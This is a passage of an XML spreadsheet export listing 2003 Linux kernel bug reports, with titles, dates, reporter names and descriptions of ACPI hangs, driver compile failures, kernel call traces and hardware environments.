    <t>Distribution: Debian Hardware Environment: Tyan S2460 (Bios 1.05) Dual Athlon (1.46GHz) system. 1xGDTH SCSI RAID card, PCI sound/ethernet. Nothing fancy here. Software Environment: configured with SMP Problem Description: This kernel cannot reboot this hardware. Steps to reproduce: 'shutdown -r' will leave the box hung at 'Restarting system'.</t>
  </si>
  <si>
    <t>Dave Kleikamp</t>
  </si>
  <si>
    <t>Yenta + ACPI = lockup, unless pci=noacpi</t>
  </si>
  <si>
    <t>2.5.50 - 2.5.66 at least.</t>
  </si>
  <si>
    <t>2003-04-01 11:17 UTC</t>
  </si>
  <si>
    <t>Matthew Harrell</t>
  </si>
  <si>
    <t>2004-04-12 21:16 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Woody / Sid Hardware Environment: HP ZT1195 laptop Software Environment: Problem Description: Ever since that that update around 2.5.50 of the ACPI system I cannot boot my laptop at all with anything other than acpi=off. I am trying to build the older kernels to determine exactly which version started this problem. I do have a working version of 2.5.48 I'm using right now which produces the following interrupts: CPU0 0: 725368 XT-PIC timer 1: 4038 XT-PIC i8042 2: 0 XT-PIC cascade 8: 4 XT-PIC rtc 9: 31 XT-PIC acpi, VIA8233 10: 581 XT-PIC uhci-hcd, eth0 11: 3160 XT-PIC PCI device 1524:1410 (ENE Technology Inc), eth1 12: 14931 XT-PIC i8042 14: 9367 XT-PIC ide0 15: 27 XT-PIC ide1 NMI: 0 LOC: 0 ERR: 0 dmesg sections from 2.5.45: ACPI: have wakeup address 0xc0001000 On node 0 totalpages: 126960 DMA zone: 4096 pages, LIFO batch:1 Normal zone: 122864 pages, LIFO batch:16 HighMem zone: 0 pages, LIFO batch:1 ACPI: RSDP (v000 OID_00 ) @ 0x000e5010 ACPI: RSDT (v001 INSYDE RSDT_000 00000.00001) @ 0x1efffbc0 ACPI: FADT (v003 INSYDE FACP_000 00000.00256) @ 0x1efffac0 ACPI: BOOT (v001 INSYDE SYS_BOOT 00000.00256) @ 0x1efffb50 ACPI: DBGP (v001 INSYDE DBGP_000 00000.00256) @ 0x1efffb80 ACPI: DSDT (v001 INSYDE VT8633 00000.04096) @ 0x00000000 ACPI: BIOS passes blacklist ACPI: MADT not present .... ACPI: Subsystem revision 20021022 ACPI-0357: *** Warning: Inconsistent FADT length (0x84) and revision (0x3), using FADT V1.0 portion of table ACPI-0508: *** Info: GPE Block0 defined as GPE0 to GPE15 ACPI breakpoint: Executed AML Breakpoint opcode ACPI: Interpreter enabled ACPI: Using PIC for interrupt routing ACPI: (supports S0 S3 S4 S5) ACPI: PCI Interrupt Link [LNKA] (IRQs 5 7 10 *11) ACPI: PCI Interrupt Link [LNKB] (IRQs 5 7 10, enabled at IRQ 11) ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) ACPI: PCI Interrupt Link [LNKD] (IRQs 5 7 *10) ACPI: PCI Root Bridge [PCI0] (00:00) PCI: Probing PCI hardware (bus 00) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: Embedded Controller [EC0] (gpe 1) dmesg from my latest attempt, 2.5.66-bk7 with a fixed DSDT: On node 0 totalpages: 126960 DMA zone: 4096 pages, LIFO batch:1 Normal zone: 122864 pages, LIFO batch:16 HighMem zone: 0 pages, LIFO batch:1 ACPI: RSDP (v000 OID_00 ) @ 0x000e5010 ACPI: RSDT (v001 INSYDE RSDT_000 00000.00001) @ 0x1efffbc0 ACPI: FADT (v003 INSYDE FACP_000 00000.00256) @ 0x1efffac0 ACPI: BOOT (v001 INSYDE SYS_BOOT 00000.00256) @ 0x1efffb50 ACPI: DBGP (v001 INSYDE DBGP_000 00000.00256) @ 0x1efffb80 ACPI: DSDT (v001 INSYDE VT8633 00000.04096) @ 0x00000000 ACPI: BIOS passes blacklist ACPI: MADT not present ... ACPI: Subsystem revision 20030228 tbconvrt-0375: *** Warning: Inconsistent FADT length (0x84) and revision (0x3), using FADT V1.0 portion of table tbget-0292: *** Info: Table [DSDT] replaced by host OS tbxface-0117 [03] acpi_load_tables : ACPI Tables successfully acquired Parsing all Control Methods:................................................................................................................................................ Table [DSDT] - 664 Objects with 45 Devices 144 Methods 27 Regions ACPI Namespace successfully loaded at root c0428bbc evxfevnt-0092 [04] acpi_enable : Transition to ACPI mode successful evgpe-0416 [06] ev_create_gpe_block : GPE Block: 2 registers at 0000000000001020 evgpe-0421 [06] ev_create_gpe_block : GPE Block defined as GPE0 to GPE15 Executing all Device _STA and_INI methods:........&lt;3&gt;ACPI breakpoint: Executed AML Breakpoint opcode ..................................... 45 Devices found containing: 45 _STA, 5 _INI methods Completing Region/Field/Buffer/Package initialization:............................................................ Initialized 18/27 Regions 0/0 Fields 21/21 Buffers 21/21 Packages (664 nodes) ACPI: Interpreter enabled ACPI: Using PIC for interrupt routing ACPI: PCI Interrupt Link [LNKA] (IRQs 5 7 10 *11) ACPI: PCI Interrupt Link [LNKB] (IRQs 5 7 10, enabled at IRQ 11) ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) ACPI: PCI Interrupt Link [LNKD] (IRQs 5 7 *10) ACPI: PCI Root Bridge [PCI0] (00:00) PCI: Probing PCI hardware (bus 00) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: Embedded Controller [EC0] (gpe 1) I've downloaded and installed the latest BIOS from HP and that didn't change anything. I also followed the instructions on fixing my dsdt table and put that in the kernel but that didn't change anything either. Steps to reproduce: Just boot :) Everything appears fine until it gets to the point around where acpid starts - at that point the system slows down immensely and then freezes a few minutes later. If I prevent acpid from starting then it freezes on the next program, the alsa setup. If I take that out then it freezes on lircd. When it does freeze the hard drive light stays on solid but the hard drive makes no noise. The system is totally unresponsive and requires a hard reset.</t>
  </si>
  <si>
    <t>HPT372N didn't defined in linux/pci_ids.h</t>
  </si>
  <si>
    <t>2.4.21-pre7</t>
  </si>
  <si>
    <t>2003-04-05 20:05 UTC</t>
  </si>
  <si>
    <t>m841lr</t>
  </si>
  <si>
    <t>2003-06-11 09:42 UTC</t>
  </si>
  <si>
    <t>Distribution:Slackware9 Hardware Environment:2themax k7s3a+ with HighPoint raid372 Software Environment:Linux Problem Description:compile kernel 2.4.21-pre7 error due to HPT372N is not defined Steps to reproduce: make menuconfig -&gt; select module hpt366.o make dep -&gt; no error make bzImage -&gt; no error make modules -&gt; error occur</t>
  </si>
  <si>
    <t>system halt after startx</t>
  </si>
  <si>
    <t>2003-04-06 01:48 UTC</t>
  </si>
  <si>
    <t>ning an</t>
  </si>
  <si>
    <t>2003-05-06 01:47 UTC</t>
  </si>
  <si>
    <t>Distribution:system halt if I start again Hardware Environment:PIII 800,VIA apollo pro 266,radeon7500 Software Environment:RedHat 8.0,glibc2.3.2,xfree86-4.3.0,gnome-2.2 Problem Description:when I exit from Gnome,startx again. system halt when I see the Mesh screen. ctrl-alt-Fn doesn't work.I have to press power button to reboot. (On kernel2.4.20 which I compiled there's not such a problem. And running xinit the problem won't happen.I have reinstall Xfree86 and compiling kernel-2.5.66 for several times but it stay the same) Steps to reproduce:1.login and startx. 2.exit from gnome and startx again. 3.system halt.</t>
  </si>
  <si>
    <t>bad: scheduling while atomic! warning on modprobe airo_cs</t>
  </si>
  <si>
    <t>2003-04-06 06:20 UTC</t>
  </si>
  <si>
    <t>Grzegorz jaskiewicz</t>
  </si>
  <si>
    <t>2004-12-01 05:31 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian woody Hardware Environment: sony vaio picture book pcg-c1ve Software Environment: gcc-3.2.2 nalesnik:~# cardmgr -V cardmgr version 3.2.2 00:0c.0 CardBus bridge: Ricoh Co Ltd RL5c475 (rev 80) Problem Description: i got this warning: bad: scheduling while atomic! Given trace: Apr 6 13:44:42 nalesnik kernel: Call Trace: Apr 6 13:44:42 nalesnik kernel: [schedule+1299/1312] schedule+0x513/0x520 Apr 6 13:44:42 nalesnik kernel: [__getblk+55/112] __getblk+0x37/0x70 Apr 6 13:44:42 nalesnik kernel: [&lt;c7a91b00&gt;] sendcommand+0xa0/0xe0 [airo] Apr 6 13:44:42 nalesnik kernel: [&lt;c7a91a30&gt;] issuecommand+0x60/0x90 [airo] Apr 6 13:44:42 nalesnik kernel: [&lt;c7a92008&gt;] PC4500_accessrid+0x48/0x80 [airo] Apr 6 13:44:42 nalesnik kernel: [&lt;c7a920b1&gt;] PC4500_readrid+0x71/0x150 [airo] Apr 6 13:44:42 nalesnik kernel: [&lt;c7a8f629&gt;] readStatsRid+0x29/0x50 [airo] Apr 6 13:44:42 nalesnik kernel: [&lt;c7a8fc49&gt;] airo_get_stats+0x29/0xe0 [airo] Apr 6 13:44:42 nalesnik kernel: [rcu_process_callbacks+358/416] rcu_process_ca llbacks+0x166/0x1a0 Apr 6 13:44:42 nalesnik kernel: [tasklet_action+119/192] tasklet_action+0x77/0 xc0 Apr 6 13:44:42 nalesnik kernel: [scheduler_tick+927/944] scheduler_tick+0x39f/ 0x3b0 Apr 6 13:44:42 nalesnik kernel: [rcu_process_callbacks+358/416] rcu_process_ca llbacks+0x166/0x1a0 Apr 6 13:44:42 nalesnik kernel: [update_process_times+69/96] update_process_ti mes+0x45/0x60 Apr 6 13:44:42 nalesnik kernel: [tasklet_action+119/192] tasklet_action+0x77/0 xc0 Apr 6 13:44:42 nalesnik kernel: [do_IRQ+309/384] do_IRQ+0x135/0x180 Apr 6 13:44:42 nalesnik kernel: [common_interrupt+24/32] common_interrupt+0x18 /0x20 Apr 6 13:44:42 nalesnik kernel: [vsnprintf+532/1136] vsnprintf+0x214/0x470 Apr 6 13:44:42 nalesnik kernel: [seq_printf+71/96] seq_printf+0x47/0x60 Apr 6 13:44:42 nalesnik kernel: [dev_seq_printf_stats+235/256] dev_seq_printf_ stats+0xeb/0x100 Apr 6 13:44:42 nalesnik kernel: [dev_seq_show+28/64] dev_seq_show+0x1c/0x40 Apr 6 13:44:42 nalesnik kernel: [seq_read+467/768] seq_read+0x1d3/0x300 Apr 6 13:44:42 nalesnik kernel: [vfs_read+225/480] vfs_read+0xe1/0x1e0 Apr 6 13:44:42 nalesnik kernel: [sys_read+62/96] sys_read+0x3e/0x60 Apr 6 13:44:42 nalesnik kernel: [syscall_call+7/11] syscall_call+0x7/0xb And second one: Apr 6 13:44:42 nalesnik kernel: bad: scheduling while atomic! Apr 6 13:44:42 nalesnik kernel: Call Trace: Apr 6 13:44:42 nalesnik kernel: [schedule+1299/1312] schedule+0x513/0x520 Apr 6 13:44:42 nalesnik kernel: [__getblk+55/112] __getblk+0x37/0x70 Apr 6 13:44:42 nalesnik kernel: [&lt;c7a91b00&gt;] sendcommand+0xa0/0xe0 [airo] Apr 6 13:44:42 nalesnik kernel: [&lt;c7a91a30&gt;] issuecommand+0x60/0x90 [airo] Apr 6 13:44:42 nalesnik kernel: [&lt;c7a92008&gt;] PC4500_accessrid+0x48/0x80 [airo] Apr 6 13:44:42 nalesnik kernel: [&lt;c7a920b1&gt;] PC4500_readrid+0x71/0x150 [airo] Apr 6 13:44:42 nalesnik kernel: [get_cnode+27/160] get_cnode+0x1b/0xa0 Apr 6 13:44:42 nalesnik kernel: [&lt;c7a8f629&gt;] readStatsRid+0x29/0x50 [airo] Apr 6 13:44:42 nalesnik kernel: [&lt;c7a8fc49&gt;] airo_get_stats+0x29/0xe0 [airo] Apr 6 13:44:42 nalesnik kernel: [check_journal_end+392/688] check_journal_end+ 0x188/0x2b0 Apr 6 13:44:42 nalesnik kernel: [do_journal_end+211/3168] do_journal_end+0xd3/ 0xc60 Apr 6 13:44:42 nalesnik kernel: [update_process_times+69/96] update_process_ti mes+0x45/0x60 Apr 6 13:44:42 nalesnik kernel: [do_IRQ+309/384] do_IRQ+0x135/0x180 Apr 6 13:44:42 nalesnik kernel: [common_interrupt+24/32] common_interrupt+0x18 /0x20 Apr 6 13:44:42 nalesnik kernel: [vsnprintf+532/1136] vsnprintf+0x214/0x470 Apr 6 13:44:42 nalesnik kernel: [seq_printf+71/96] seq_printf+0x47/0x60 Apr 6 13:44:42 nalesnik kernel: [dev_seq_printf_stats+235/256] dev_seq_printf_ stats+0xeb/0x100 Apr 6 13:44:42 nalesnik kernel: [dev_seq_show+28/64] dev_seq_show+0x1c/0x40 Apr 6 13:44:42 nalesnik kernel: [seq_read+467/768] seq_read+0x1d3/0x300 Apr 6 13:44:42 nalesnik kernel: [vfs_read+225/480] vfs_read+0xe1/0x1e0 Apr 6 13:44:42 nalesnik kernel: [sys_read+62/96] sys_read+0x3e/0x60 Apr 6 13:44:42 nalesnik kernel: [syscall_call+7/11] syscall_call+0x7/0xb Apr 6 13:44:42 nalesnik kernel: :44:42 nalesnik kernel: Steps to reproduce: just insert cisco aironet card and let cardmgr do modprob adding two modules: airo_cs 6592 0 airo 54568 2 airo_cs and that is it. System is stable after, and card is working fine. But i guess warning is not just for information :-)</t>
  </si>
  <si>
    <t>Hard hang encountered when DOTS was run against PostgreSQL (7.3.2-1) Linux kernel-2.5.66 on a 4-way</t>
  </si>
  <si>
    <t>2003-04-07 07:31 UTC</t>
  </si>
  <si>
    <t>2003-06-23 08:57 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 8.0 Hardware Environment:IBM Netfinity 7100, 4GB RAM, 4-way, Pentium-III 700MHz Software Environment:DOTS, PostgreSQL Problem Description: DOTS was run against PostgreSQL (7.3.2-1) on kernel-2.5.66 (4way). Three clients were used to stress the kernel. Each client had 4 sessions and each session had 10 connections to the database server (PostgreSQL). Within 30 min the server went into a hard hang. Magic SysRq key was not functional though during compilation of the kernel the feature was turned on. So in order to get the dump on I enabled the serial port and modified the lilo.conf to include the NMI Watchdog timer =1 and the serial console. The lilo.conf is as follows: image=/boot/vmlinuz-2.5.66 label=linux-2.5.66 read-only append="nmi_watchdog=1 console=ttyS0,9600 console=tty0 acpi=off" Even with the serial port switched on /NMI Watchdog timer, I could not get any dump/message in the console. No messages were logged in the dmesg or /var/log/messages. Steps to reproduce: (1) Inatall the kernel-2.5.66 (kernel is to be downloaded from kernel.org) (2) Install the jdk1.4.1 from Sun site. (3) Install the DOTS and configure the dots on the server and clients (4) Run the Dots. Note: Dots HowTo can be found at:http://ltp.sf.net/dotshowto.php Dots can be downloaded from: http://sourcerforge.net/project/showfiles.php?group_id=3382</t>
  </si>
  <si>
    <t>ACPI Battery: Not working on Acer Aspire / VIA Chipset</t>
  </si>
  <si>
    <t>2003-04-07 08:35 UTC</t>
  </si>
  <si>
    <t>Martin Eitzenberger</t>
  </si>
  <si>
    <t>2004-03-03 21:23 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/Unstable Hardware Environment: Acer Aspire 1307LC Software Environment: Debian GNU/Linux Unstable Problem Description: The ACPI Battery-Monitor is not working on my Acer Aspire 1307LC (was also not working in 2.4.20). Kernel is the standard 2.4.20 prepatched to 2.4.21-pre7. proc-info: proxima:/proc/acpi/battery/0$ cat info Present: no proxima:/proc/acpi/battery/0$ cat status Present: no lspci-output: proxima:/proc/acpi/battery/0$ lspci 00:00.0 Host bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133] (rev 80) 00:01.0 PCI bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133 AGP] 00:0a.0 CardBus bridge: O2 Micro, Inc. OZ6912 Cardbus Controller 00:11.0 ISA bridge: VIA Technologies, Inc. VT8231 [PCI-to-ISA Bridge] (rev 10) 00:11.1 IDE interface: VIA Technologies, Inc. VT82C586/B/686A/B PIPC Bus Master IDE (rev 06) 00:11.2 USB Controller: VIA Technologies, Inc. USB (rev 1e) 00:11.4 Bridge: VIA Technologies, Inc. VT8235 ACPI (rev 10) 00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT82C686 AC97 Audio Controller (rev 40) 00:11.6 Communication controller: VIA Technologies, Inc. Intel 537 [AC97 Modem] (rev 20) 00:12.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 51) 01:00.0 VGA compatible controller: S3 Inc. VT8636A [ProSavage KN133] AGP4X VGA Controller (TwisterK) (rev 01) lsmod | grep ospm output: proxima:/proc/acpi/battery/0$ lsmod | grep ospm ospm_thermal 6512 0 (unused) ospm_system 6740 0 (unused) ospm_processor 7288 0 (unused) ospm_ec 4520 0 (unused) ospm_button 4032 0 (unused) ospm_battery 6644 0 (unused) ospm_ac_adapter 2836 0 (unused) ospm_busmgr 14484 0 [ospm_thermal ospm_system ospm_processor ospm_ec ospm_button ospm_battery ospm_ac_adapter] Steps to reproduce: Use Acer Aspire 1300 Series Laptop with ACPI.</t>
  </si>
  <si>
    <t>Sound doesn't work with ALSA or OSS</t>
  </si>
  <si>
    <t>2.5.67</t>
  </si>
  <si>
    <t>2003-04-07 18:17 UTC</t>
  </si>
  <si>
    <t>Renaud Lepage</t>
  </si>
  <si>
    <t>2003-04-08 06:31 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.0 Hardware Environment: Asus A7N266-C with only audio integrated Software Environment: Linux 2.5.67 home-compiled - sweet!, GCC 3.2.(?) Problem Description: I managed to compile the 2.5.67 kernel from scratch with framebuffer support, all, even USB mouse support! The problem is that not a single one of the two sound drivers (Advanced Linux Sound Arch and Open Sound System) works. Of course, since I had some uninteresting experiences with modules, I integrated ALL in the bzImage. Fact is that sound doesn't work. Steps to reproduce: 1- Get an A7N266-C (Asus) 2- Install Linux (what version ever...) 3- Compile 2.5.67 with what you want, but don't take OSS, take ALSA, and include only the nForce/i810 audio driver 4- Lilo it and boot with it. Then test the audio. 5- Recompile 2.5.67 with OSS support and without ALSA support, still only with i8xx support. 6- Lilo it and reboot in your YAN (Yet Another New) kernel. Test the audio. 7- Now scream of anger like I did and patch it, please... One curious thing is that, with ALSA, when I test the audio, it doesn't make any error. Like if it DID work. But no sound comes out of the speakers. and YES, I have verified that they are plugged and online. I like 2.5.67 otherwise. And I am waitin for the patch so I can do a clean compile of KDE 3.1 on a brand new kernel.</t>
  </si>
  <si>
    <t>Vesa Framebuffer shows Corrupted Cursor</t>
  </si>
  <si>
    <t>2003-04-08 11:46 UTC</t>
  </si>
  <si>
    <t>Unai</t>
  </si>
  <si>
    <t>2003-05-05 18:04 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce:</t>
  </si>
  <si>
    <t>Build error on file drivers/mtd/mtdblock.c</t>
  </si>
  <si>
    <t>2003-04-09 07:55 UTC</t>
  </si>
  <si>
    <t>Tobias Hunger</t>
  </si>
  <si>
    <t>2003-04-30 06:49 UTC</t>
  </si>
  <si>
    <t>Distribution: source form ftp.kernel.org Hardware Environment: mobile PIII Software Environment: Debian Problem Description: Building the kernel fails with the following error: Steps to reproduce: Build a kernel with MTD enabled. gcc -Wp,-MD,drivers/mtd/.mtdblock.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=pentium3 -Iinclude/asm-i386/mach-default -fomit-frame-pointer -nostdinc -iwithprefix include -DMODULE -DKBUILD_BASENAME=mtdblock -DKBUILD_MODNAME=mtdblock -c -o drivers/mtd/.tmp_mtdblock.o drivers/mtd/mtdblock.c drivers/mtd/mtdblock.c: In function `handle_mtdblock_request': drivers/mtd/mtdblock.c:391: warning: assignment makes pointer from integer without a cast drivers/mtd/mtdblock.c:391: syntax error before '{' token drivers/mtd/mtdblock.c:394: `p' undeclared (first use in this function) drivers/mtd/mtdblock.c:394: (Each undeclared identifier is reported only once drivers/mtd/mtdblock.c:394: for each function it appears in.) drivers/mtd/mtdblock.c: At top level: drivers/mtd/mtdblock.c:442: syntax error before '}' token make[3]: *** [drivers/mtd/mtdblock.o] Error 1 make[2]: *** [drivers/mtd] Error 2 make[1]: *** [drivers] Error 2 make[1]: Leaving directory `/usr/src/linux-2.5.67' make: *** [stamp-build] Error 2</t>
  </si>
  <si>
    <t>kernel prints "mtrr: MTRR 2 not used" twice when exiting X</t>
  </si>
  <si>
    <t>MTTR</t>
  </si>
  <si>
    <t>2.5.67-bk1</t>
  </si>
  <si>
    <t>2003-04-09 13:09 UTC</t>
  </si>
  <si>
    <t>2003-06-18 16:37 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: Dell Optiplex GXa, P2 266mhz, Rage Pro AGP, 256mb RAM Video mode to be used for restore is ffff BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 00000000000a0000 (usable) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 0000000010000000 (usable) BIOS-e820: 00000000ffe00000 - 0000000100000000 (reserved) &lt;snip&gt; mtrr: v2.0 (20020519) PCI: PCI BIOS revision 2.10 entry at 0xfcf4e, last bus=2 &lt;snip&gt; Linux agpgart interface v0.100 (c) Dave Jones agpgart: Detected Intel 440LX chipset agpgart: Maximum main memory to use for agp memory: 204M agpgart: AGP aperture is 64M @ 0xf0000000 [drm] AGP 0.100 aperture @ 0xf0000000 64MB [drm] Initialized r128 2.3.0 20021029 on minor 0 Software Environment: X configed to load dri and drm. CONFIG_MTRR=y CONFIG_AGP=y CONFIG_AGP_INTEL=y CONFIG_DRM=y CONFIG_DRM_R128=y Problem Description: When exiting X (using ctrl+alt+backspace, I don't have a mouse on this machine yet) the kernel prints the following message twice: "mtrr: MTRR 2 not used" Steps to reproduce: Exit X using ctrl+alt+bksp</t>
  </si>
  <si>
    <t>compile failure in drivers/char/rio/rio_linux.c</t>
  </si>
  <si>
    <t>2003-04-09 14:44 UTC</t>
  </si>
  <si>
    <t>2003-04-19 23:31 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD AthlonXP 2100+, 512MB DDR Software Environment: gcc 3.2.2, glibc 2.3.1, ld 2.13.90.0.18 Problem Description: gcc -Wp,-MD,drivers/char/rio/.rio_linux.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=rio_linux -DKBUILD_MODNAME=rio -c -o drivers/char/rio/.tmp_rio_linux.o drivers/char/rio/rio_linux.c drivers/char/rio/rio_linux.c: In function `rio_ioctl': drivers/char/rio/rio_linux.c:732: warning: implicit declaration of function `verify_area' drivers/char/rio/rio_linux.c:732: `VERIFY_READ' undeclared (first use in this function) drivers/char/rio/rio_linux.c:732: (Each undeclared identifier is reported only once drivers/char/rio/rio_linux.c:732: for each function it appears in.) drivers/char/rio/rio_linux.c:734: warning: implicit declaration of function `get_user' drivers/char/rio/rio_linux.c:741: `VERIFY_WRITE' undeclared (first use in this function) make[3]: *** [drivers/char/rio/rio_linux.o] Error 1 make[2]: *** [drivers/char/rio] Error 2 make[1]: *** [drivers/char] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Character devices ---&gt; &lt;*&gt; Specialix RIO system support CONFIG_RIO=y</t>
  </si>
  <si>
    <t>I2C</t>
  </si>
  <si>
    <t>compile failure in drivers/isdn/hisax/sedlbauer.c</t>
  </si>
  <si>
    <t>2003-04-09 15:01 UTC</t>
  </si>
  <si>
    <t>2003-09-19 08:28 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD AthlonXP 2100+, 512MB DDR Software Environment: gcc 3.2.2, glibc 2.3.1, ld 2.13.90.0.18 Problem Description: gcc -Wp,-MD,drivers/isdn/hisax/.sedlbauer.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DHISAX_MAX_CARDS=8 -DKBUILD_BASENAME=sedlbauer -DKBUILD_MODNAME=hisax -c -o drivers/isdn/hisax/.tmp_sedlbauer.o drivers/isdn/hisax/sedlbauer.c drivers/isdn/hisax/sedlbauer.c: In function `setup_sedlbauer': drivers/isdn/hisax/sedlbauer.c:762: label `err' used but not defined make[3]: *** [drivers/isdn/hisax/sedlbauer.o] Error 1 make[2]: *** [drivers/isdn/hisax] Error 2 make[1]: *** [drivers/isdn] Error 2 make: *** [drivers] Error 2 Steps to reproduce: ISDN subsystem ---&gt; Passive cards ---&gt; [*] Sedlbauer cards CONFIG_HISAX_SEDLBAUER=y</t>
  </si>
  <si>
    <t>compile failure in drivers/isdn/hisax/isurf.c</t>
  </si>
  <si>
    <t>2003-04-09 15:04 UTC</t>
  </si>
  <si>
    <t>2003-07-21 15:15 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD AthlonXP 2100+, 512MB DDR Software Environment: gcc 3.2.2, glibc 2.3.1, ld 2.13.90.0.18 Problem Description: gcc -Wp,-MD,drivers/isdn/hisax/.isurf.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DHISAX_MAX_CARDS=8 -DKBUILD_BASENAME=isurf -DKBUILD_MODNAME=hisax -c -o drivers/isdn/hisax/.tmp_isurf.o drivers/isdn/hisax/isurf.c drivers/isdn/hisax/isurf.c: In function `setup_isurf': drivers/isdn/hisax/isurf.c:239: `cs' undeclared (first use in this function) drivers/isdn/hisax/isurf.c:239: (Each undeclared identifier is reported only once drivers/isdn/hisax/isurf.c:239: for each function it appears in.) make[3]: *** [drivers/isdn/hisax/isurf.o] Error 1 make[2]: *** [drivers/isdn/hisax] Error 2 make[1]: *** [drivers/isdn] Error 2 make: *** [drivers] Error 2 Steps to reproduce: ISDN subsystem ---&gt; Passive cards ---&gt; [*] Siemens I-Surf card CONFIG_HISAX_ISURF=y</t>
  </si>
  <si>
    <t>compile failure in drivers/media/video/saa7111.c</t>
  </si>
  <si>
    <t>2003-04-09 15:10 UTC</t>
  </si>
  <si>
    <t>2003-05-01 15:31 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD AthlonXP 2100+, 512MB DDR Software Environment: gcc 3.2.2, glibc 2.3.1, ld 2.13.90.0.18 Problem Description: gcc -Wp,-MD,drivers/media/video/.saa7111.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=saa7111 -DKBUILD_MODNAME=saa7111 -c -o drivers/media/video/.tmp_saa7111.o drivers/media/video/saa7111.c drivers/media/video/saa7111.c: In function `saa7111_attach': drivers/media/video/saa7111.c:110: `client_template' undeclared (first use in this function) drivers/media/video/saa7111.c:110: (Each undeclared identifier is reported only once drivers/media/video/saa7111.c:110: for each function it appears in.) drivers/media/video/saa7111.c: At top level: drivers/media/video/saa7111.c:396: `client_template' used prior to declaration drivers/media/video/saa7111.c:396: warning: `client_template' defined but not used make[3]: *** [drivers/media/video/saa7111.o] Error 1 make[2]: *** [drivers/media/video] Error 2 make[1]: *** [drivers/media] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Multimedia devices ---&gt; Video For Linux ---&gt; &lt;*&gt; Iomega Buz support CONFIG_VIDEO_ZORAN_BUZ=y</t>
  </si>
  <si>
    <t>Change compile-time option CONFIG_APM_RTS_IS_GMT to sysctl-tunable kernel parameter</t>
  </si>
  <si>
    <t>Power Management</t>
  </si>
  <si>
    <t>APM</t>
  </si>
  <si>
    <t>2.5.64-mm6 (and others)</t>
  </si>
  <si>
    <t>2003-04-10 08:47 UTC</t>
  </si>
  <si>
    <t>Otto J. Makela</t>
  </si>
  <si>
    <t>2011-07-30 05:07 UTC</t>
  </si>
  <si>
    <t>Olaf Kirch</t>
  </si>
  <si>
    <t>Distribution: RH8.0 Hardware Environment: Dell Latitude C600 laptop + docking station Problem Description: The fact that CONFIG_APM_RTS_IS_GMT is a kernel compile-time flag instead of a sysctl-tunable parameter (and companies like RedHat deliver kernels compiled with this flag on) means that you have to recompile the kernel just to be able to run Linux in environments where the RTC _cannot_ be set to GMT (like when co-existing with Windows operating systems). Once set up, the kernel parameter could be set according to /etc/sysconfig/clock setting at boot time, simplifying life for all. A quick browse of the apm.c source code makes me think this change would not really require major work, but of course I could be mistaken. Steps to reproduce: The usual problems occur when the kernel compile flag setting does not match with the actual RTC setting, like time zone changes when switching displays via the APM BIOS.</t>
  </si>
  <si>
    <t>IDE module loop</t>
  </si>
  <si>
    <t>2003-04-12 12:54 UTC</t>
  </si>
  <si>
    <t>Jochen Friedrich</t>
  </si>
  <si>
    <t>2004-02-04 09:52 UTC</t>
  </si>
  <si>
    <t>Bartlomiej Zolnierkiewicz</t>
  </si>
  <si>
    <t>768 1880</t>
  </si>
  <si>
    <t>Distribution:Debian unstable Hardware Environment:Alpha Miata 500au Software Environment:module-init-tools 0.9.11 Problem Description:Compiling IDE subsystem as modules results in module loop Steps to reproduce:Compile all IDE components as modules Run depmod -ae 2.5.67 WARNING: Loop detected: /lib/modules/2.5.67/kernel/drivers/ide/ide-iops.ko needs ide.ko which needs ide-iops.ko again!</t>
  </si>
  <si>
    <t>drivers/char/genrtc.c doesn't compile, RTC_BATT_BAD not defined</t>
  </si>
  <si>
    <t>Realtime Clock</t>
  </si>
  <si>
    <t>2003-04-12 14:25 UTC</t>
  </si>
  <si>
    <t>David Walser</t>
  </si>
  <si>
    <t>2003-04-20 13:10 UTC</t>
  </si>
  <si>
